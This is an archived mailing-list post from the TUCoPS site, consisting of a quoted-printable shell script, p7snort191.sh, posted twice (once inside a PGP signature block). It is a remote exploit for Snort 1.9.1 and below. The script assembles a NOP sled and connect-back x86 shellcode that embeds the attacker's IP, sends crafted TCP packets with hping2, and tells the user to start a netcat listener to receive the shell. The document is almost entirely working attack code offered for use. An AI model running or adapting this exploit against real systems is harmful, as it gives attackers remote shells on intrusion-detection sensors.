Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Linux :: Apps N-Z :: bt33.txt

Snort <=1.9.1 exploit





--/NkBOFFp2J2Af1nK
Content-Type: multipart/mixed; boundary="qMm9M+Fa2AknHoGS"
Content-Disposition: inline


--qMm9M+Fa2AknHoGS
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

Here is some proof of concept code for the snort <=3D1.9.1 vuln.

--=20
/* truff (truff@projet7.org)
 * pgp public key: http://projet7.tuxfamily.org/pgp/truff.pgp
 * http://www.projet7.org  (Security Researchs)
 */

--qMm9M+Fa2AknHoGS
Content-Type: application/x-sh
Content-Disposition: attachment; filename="p7snort191.sh"
Content-Transfer-Encoding: quoted-printable

#!/bin/sh=0A=0A##########################################################=
=0A# p7snort191.sh by truff (truff@projet7.org)             #=0A# Snort 1.9=
.1 and below remote exploit                   #=0A#                        =
                                #=0A# Tested on Slackware 8.0 with Snort 1.=
9.1 from sources  #=0A#                                                    =
    #=0A# Usage:                                                 #=0A# 1/ L=
aunch a listening netcat to listen for the shell   #=0A#    nc -p 45295 -l =
                                     #=0A#                                 =
                       #=0A# 2/ p7snort119.sh yourIP [Ret_Addr]            =
         #=0A#                                                        #=0A#=
 Where yourIP is the IP where the netcat is listening   #=0A# and Ret_Addr =
is the address (8 hexa digits) of the     #=0A# shellcode (eg: 0819fec2)   =
                            #=0A#                                          =
              #=0A#                                                        =
#=0A# This vulnerability was discovered by Bruce Leidl,      #=0A# Juan Pab=
lo Martinez Kuhn, and Alejandro David Weil     #=0A# from Core Security Tec=
hnologies during Bugweek 2003.   #=0A#                                     =
                   #=0A# Greetz to #root people and projet7 members.       =
     #=0A# Special thx to mycroft for helping me with shell       #=0A# scr=
ipting stuff.                                       #=0A#                  =
                                      #=0A#  www.projet7.org               =
- Security Researchs -  #=0A###############################################=
###########=0A=0A=0A# Put here the path to your hping2 binary=0AHPING2=3D/u=
sr/sbin/hping2=0A=0A# You should change these params to make the snort sens=
or =0A# capture the packets.=0AIPSRC=3D192.168.22.1=0AIPDST=3D192.168.22.2=
=0APTSRC=3D3339=0APTDST=3D111=0A=0A=0A=0Aecho "p7snort191.sh by truff (truf=
f@projet7.org)"=0A=0Acase $# in=0A  0)=0A    echo "Bad number of params"=0A=
    echo "Read comments in sources"=0A    exit -1=0A    ;;=0A  1)=0A    RET=
=3D0819fec2=0A    echo "Using default retaddr (Slackware 8.0)"=0A    echo $=
RET=0A    ;;=0A  2)=0A    RET=3D$2=0A    echo "Using custom retaddr"=0A    =
echo $RET=0A    ;;=0A  *)=0A    echo "Bad number of params"=0A    echo "Rea=
d comments in sources"=0A    exit -1=0A    ;;=0Aesac=0A  =0A    =0A=0A# Nop=
s=0Ai=3D0=0Awhile [ "$i" -lt "512" ]; do=0A  i=3D$(expr "$i" + 1)=0A  echo =
-n -e "\x90" >> egg=0Adone=0A=0A=0A# linux x86 shellcode by eSDee of Netric=
 (www.netric.org)=0A# 131 byte - connect back shellcode (port=3D0xb0ef)=0Ae=
cho -n -e "\x31\xc0\x31\xdb\x31\xc9\x51\xb1" >> egg=0Aecho -n -e "\x06\x51\=
xb1\x01\x51\xb1\x02\x51" >> egg=0Aecho -n -e "\x89\xe1\xb3\x01\xb0\x66\xcd\=
x80" >> egg=0Aecho -n -e "\x89\xc2\x31\xc0\x31\xc9\x51\x51" >> egg=0Aecho -=
n -e "\x68" >> egg=0A=0A# IP here =0Aecho -n -e $(printf "\\\x%02x" $(echo =
$1 | cut -d. -f1) \=0A                               $(echo $1 | cut -d. -f=
2) \=0A                               $(echo $1 | cut -d. -f3) \=0A        =
                       $(echo $1 | cut -d. -f4)) >> egg=0A=0Aecho -n -e "\x=
66\x68\xb0" >> egg=0Aecho -n -e "\xef\xb1\x02\x66\x51\x89\xe7\xb3" >> egg=
=0Aecho -n -e "\x10\x53\x57\x52\x89\xe1\xb3\x03" >> egg=0Aecho -n -e "\xb0\=
x66\xcd\x80\x31\xc9\x39\xc1" >> egg =0Aecho -n -e "\x74\x06\x31\xc0\xb0\x01=
\xcd\x80" >> egg=0Aecho -n -e "\x31\xc0\xb0\x3f\x89\xd3\xcd\x80" >> egg=0Ae=
cho -n -e "\x31\xc0\xb0\x3f\x89\xd3\xb1\x01" >> egg=0Aecho -n -e "\xcd\x80\=
x31\xc0\xb0\x3f\x89\xd3" >> egg=0Aecho -n -e "\xb1\x02\xcd\x80\x31\xc0\x31\=
xd2" >> egg=0Aecho -n -e "\x50\x68\x6e\x2f\x73\x68\x68\x2f" >> egg=0Aecho -=
n -e "\x2f\x62\x69\x89\xe3\x50\x53\x89" >> egg=0Aecho -n -e "\xe1\xb0\x0b\x=
cd\x80\x31\xc0\xb0" >> egg=0Aecho -n -e "\x01\xcd\x80" >> egg=0A=0A# 3 dumm=
y bytes for alignment purposes=0Aecho -n -e "\x41\x41\x41" >> egg=0A=0Ai=3D=
0=0Acpt=3D$(expr 3840 - 134 - 512)=0Acpt=3D$(expr $cpt / 4)=0A=0A=0Avar1=3D=
0x$(echo $RET | cut -b7,8)=0Avar2=3D0x$(echo $RET | cut -b5,6)=0Avar3=3D0x$=
(echo $RET | cut -b3,4)=0Avar4=3D0x$(echo $RET | cut -b1,2)=0A=0Awhile [ "$=
i" -lt "$cpt" ]; do=0A  i=3D$(expr "$i" + 1)=0A  echo -n -e $(printf "\\\x%=
02x" $var1 $var2 $var3 $var4) >> egg=0Adone=0A=0A=0A# hping ruleZ=0A$HPING2=
 $IPDST -a $IPSRC -s $PTSRC -p $PTDST --ack --rst -c 1 \=0A        -d 0x1 -=
-setseq 0xffff0023 --setack 0xc0c4c014 \=0A        1>/dev/null 2>/dev/null=
=0A=0A$HPING2 $IPDST -a $IPSRC -s $PTSRC -p $PTDST --ack --rst -c 1 \=0A   =
     -d 0xF00 -E egg --setseq 0xffffffff --setack 0xc0c4c014 \=0A        1>=
/dev/null 2>/dev/null=0A=0A$HPING2 $IPSRC -a $IPDST -s $PTDST -p $PTSRC --a=
ck -c 1 \=0A        -d 0 --setseq 0xc0c4c014 --setack 0xffffffff \=0A      =
  1>/dev/null 2>/dev/null=0A=0Arm egg=0A=0Aecho "Exploit Sended"=0A=0A
--qMm9M+Fa2AknHoGS--

--/NkBOFFp2J2Af1nK
Content-Type: application/pgp-signature
Content-Disposition: inline

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Content-Type: multipart/mixed; boundary="qMm9M+Fa2AknHoGS"
Content-Disposition: inline


- --qMm9M+Fa2AknHoGS
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

Here is some proof of concept code for the snort <=3D1.9.1 vuln.

- --=20
/* truff (truff@projet7.org)
 * pgp public key: http://projet7.tuxfamily.org/pgp/truff.pgp
 * http://www.projet7.org  (Security Researchs)
 */

- --qMm9M+Fa2AknHoGS
Content-Type: application/x-sh
Content-Disposition: attachment; filename="p7snort191.sh"
Content-Transfer-Encoding: quoted-printable

#!/bin/sh=0A=0A##########################################################=
=0A# p7snort191.sh by truff (truff@projet7.org)             #=0A# Snort 1.9=
.1 and below remote exploit                   #=0A#                        =
                                #=0A# Tested on Slackware 8.0 with Snort 1.=
9.1 from sources  #=0A#                                                    =
    #=0A# Usage:                                                 #=0A# 1/ L=
aunch a listening netcat to listen for the shell   #=0A#    nc -p 45295 -l =
                                     #=0A#                                 =
                       #=0A# 2/ p7snort119.sh yourIP [Ret_Addr]            =
         #=0A#                                                        #=0A#=
 Where yourIP is the IP where the netcat is listening   #=0A# and Ret_Addr =
is the address (8 hexa digits) of the     #=0A# shellcode (eg: 0819fec2)   =
                            #=0A#                                          =
              #=0A#                                                        =
#=0A# This vulnerability was discovered by Bruce Leidl,      #=0A# Juan Pab=
lo Martinez Kuhn, and Alejandro David Weil     #=0A# from Core Security Tec=
hnologies during Bugweek 2003.   #=0A#                                     =
                   #=0A# Greetz to #root people and projet7 members.       =
     #=0A# Special thx to mycroft for helping me with shell       #=0A# scr=
ipting stuff.                                       #=0A#                  =
                                      #=0A#  www.projet7.org               =
- - Security Researchs -  #=0A###############################################=
###########=0A=0A=0A# Put here the path to your hping2 binary=0AHPING2=3D/u=
sr/sbin/hping2=0A=0A# You should change these params to make the snort sens=
or =0A# capture the packets.=0AIPSRC=3D192.168.22.1=0AIPDST=3D192.168.22.2=
=0APTSRC=3D3339=0APTDST=3D111=0A=0A=0A=0Aecho "p7snort191.sh by truff (truf=
f@projet7.org)"=0A=0Acase $# in=0A  0)=0A    echo "Bad number of params"=0A=
    echo "Read comments in sources"=0A    exit -1=0A    ;;=0A  1)=0A    RET=
=3D0819fec2=0A    echo "Using default retaddr (Slackware 8.0)"=0A    echo $=
RET=0A    ;;=0A  2)=0A    RET=3D$2=0A    echo "Using custom retaddr"=0A    =
echo $RET=0A    ;;=0A  *)=0A    echo "Bad number of params"=0A    echo "Rea=
d comments in sources"=0A    exit -1=0A    ;;=0Aesac=0A  =0A    =0A=0A# Nop=
s=0Ai=3D0=0Awhile [ "$i" -lt "512" ]; do=0A  i=3D$(expr "$i" + 1)=0A  echo =
- -n -e "\x90" >> egg=0Adone=0A=0A=0A# linux x86 shellcode by eSDee of Netric=
 (www.netric.org)=0A# 131 byte - connect back shellcode (port=3D0xb0ef)=0Ae=
cho -n -e "\x31\xc0\x31\xdb\x31\xc9\x51\xb1" >> egg=0Aecho -n -e "\x06\x51\=
xb1\x01\x51\xb1\x02\x51" >> egg=0Aecho -n -e "\x89\xe1\xb3\x01\xb0\x66\xcd\=
x80" >> egg=0Aecho -n -e "\x89\xc2\x31\xc0\x31\xc9\x51\x51" >> egg=0Aecho -=
n -e "\x68" >> egg=0A=0A# IP here =0Aecho -n -e $(printf "\\\x%02x" $(echo =
$1 | cut -d. -f1) \=0A                               $(echo $1 | cut -d. -f=
2) \=0A                               $(echo $1 | cut -d. -f3) \=0A        =
                       $(echo $1 | cut -d. -f4)) >> egg=0A=0Aecho -n -e "\x=
66\x68\xb0" >> egg=0Aecho -n -e "\xef\xb1\x02\x66\x51\x89\xe7\xb3" >> egg=
=0Aecho -n -e "\x10\x53\x57\x52\x89\xe1\xb3\x03" >> egg=0Aecho -n -e "\xb0\=
x66\xcd\x80\x31\xc9\x39\xc1" >> egg =0Aecho -n -e "\x74\x06\x31\xc0\xb0\x01=
\xcd\x80" >> egg=0Aecho -n -e "\x31\xc0\xb0\x3f\x89\xd3\xcd\x80" >> egg=0Ae=
cho -n -e "\x31\xc0\xb0\x3f\x89\xd3\xb1\x01" >> egg=0Aecho -n -e "\xcd\x80\=
x31\xc0\xb0\x3f\x89\xd3" >> egg=0Aecho -n -e "\xb1\x02\xcd\x80\x31\xc0\x31\=
xd2" >> egg=0Aecho -n -e "\x50\x68\x6e\x2f\x73\x68\x68\x2f" >> egg=0Aecho -=
n -e "\x2f\x62\x69\x89\xe3\x50\x53\x89" >> egg=0Aecho -n -e "\xe1\xb0\x0b\x=
cd\x80\x31\xc0\xb0" >> egg=0Aecho -n -e "\x01\xcd\x80" >> egg=0A=0A# 3 dumm=
y bytes for alignment purposes=0Aecho -n -e "\x41\x41\x41" >> egg=0A=0Ai=3D=
0=0Acpt=3D$(expr 3840 - 134 - 512)=0Acpt=3D$(expr $cpt / 4)=0A=0A=0Avar1=3D=
0x$(echo $RET | cut -b7,8)=0Avar2=3D0x$(echo $RET | cut -b5,6)=0Avar3=3D0x$=
(echo $RET | cut -b3,4)=0Avar4=3D0x$(echo $RET | cut -b1,2)=0A=0Awhile [ "$=
i" -lt "$cpt" ]; do=0A  i=3D$(expr "$i" + 1)=0A  echo -n -e $(printf "\\\x%=
02x" $var1 $var2 $var3 $var4) >> egg=0Adone=0A=0A=0A# hping ruleZ=0A$HPING2=
 $IPDST -a $IPSRC -s $PTSRC -p $PTDST --ack --rst -c 1 \=0A        -d 0x1 -=
- -setseq 0xffff0023 --setack 0xc0c4c014 \=0A        1>/dev/null 2>/dev/null=
=0A=0A$HPING2 $IPDST -a $IPSRC -s $PTSRC -p $PTDST --ack --rst -c 1 \=0A   =
     -d 0xF00 -E egg --setseq 0xffffffff --setack 0xc0c4c014 \=0A        1>=
/dev/null 2>/dev/null=0A=0A$HPING2 $IPSRC -a $IPDST -s $PTDST -p $PTSRC --a=
ck -c 1 \=0A        -d 0 --setseq 0xc0c4c014 --setack 0xffffffff \=0A      =
  1>/dev/null 2>/dev/null=0A=0Arm egg=0A=0Aecho "Exploit Sended"=0A=0A
- --qMm9M+Fa2AknHoGS--
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (GNU/Linux)

iD8DBQE+ppSOh82dJ0V11s8RAq5GAJ9L3TXtPYa01+BbED+McNknou2DiQCfVuN5
WV/73pn3esMTb8gwkhjcDrk=
=9Dt8
-----END PGP SIGNATURE-----

--/NkBOFFp2J2Af1nK--


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH